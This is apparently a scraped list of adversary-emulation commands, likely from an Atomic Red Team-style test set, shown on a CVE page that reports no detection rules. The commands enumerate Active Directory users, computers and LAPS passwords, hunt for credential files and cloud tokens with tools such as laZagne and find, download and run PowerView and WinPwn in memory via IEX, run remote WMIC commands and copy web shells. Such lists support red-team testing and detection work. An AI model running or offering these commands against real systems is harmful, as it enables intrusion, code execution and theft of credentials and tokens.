(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.